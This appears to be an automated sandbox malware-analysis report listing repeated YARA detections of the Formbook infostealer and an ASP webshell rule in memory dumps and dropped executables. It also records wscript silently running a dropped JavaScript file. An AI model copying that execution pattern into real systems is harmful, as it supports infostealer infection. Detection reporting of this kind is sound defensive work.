Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.291278262.000001E33FAD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Wscript called in batch mode (surpress errors)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js Jump to behavior
Yara signature match
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272269605.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.274118821.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273757086.000001E33FAF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272435860.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273520622.000001E33FA71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.291278262.000001E33FAD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.271100464.000001E33FA55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272975523.000001E33FA54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272013161.000001E33F9B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
